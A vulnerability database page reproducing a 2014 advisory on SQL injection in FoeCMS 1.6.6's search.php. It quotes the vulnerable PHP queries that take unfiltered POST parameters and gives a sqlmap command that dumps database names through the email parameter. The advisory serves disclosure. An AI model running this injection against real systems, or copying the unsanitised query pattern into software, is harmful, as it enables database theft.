Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FoeCMS 1.6.6 SQL Injection

🗓️ 11 Jul 2014 00:00:00Reported by Jagriti SahuType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

FoeCMS 1.6.6 SQL Injection Vulnerability in Search Pag

Code
`  
  
##################################################################################################  
#Exploit Title : FoeCMS SQL inection vulnerability in search page  
#Author : Jagriti Sahu  
#Vendor : http://foecms.com/  
#Download Link :   
https://github.com/themarioga/FoeCMS/archive/master.zip  
#Date : 11/07/2014  
#Discovered at : IndiShell Lab  
#Love to : Surbhi, Mradula and Harry  
#Greez to : ALL Indian hackers  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
FoeCMS suffers from remote SQL injection vulnerability which can be   
exploited by hacker to gain information stored in database  
there are multiple parameters which are affected from this   
vulnerability  
like search.php page  
parameters email,name and cookie parameter foecms_lang=2 does not check   
for user supplied data and vulnerable to remote SQL injection  
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
in page search.php  
  
on line 32  
$u_row = fetchUserBy("username", $_POST["author"]);  
$_POST["author"] parameter is not checked by code before   
passing to sql query  
on line 34  
$u_res = mysql_query("SELECT * FROM ".$MYSQL_PREFIX."account WHERE   
email='".$_POST["email"]."'");  
$_POST["email"] parameter is getting pass to SQL query without   
filteration  
  
  
//////////////////////////////  
/// Proof of Concept: -  
//////////////////////////////  
  
cms is installed on location  
http://localhost/foecms  
following payload with SQLmap give me confirmation of SQL injection   
existance  
  
./sqlmap.py -u http://localhost/foecms/search.php   
--data=name=&author=&[email protected] -p email --dbs  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Jul 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
foecmssql injectionsearch pagevulnerabilitydatabasesqlmap
27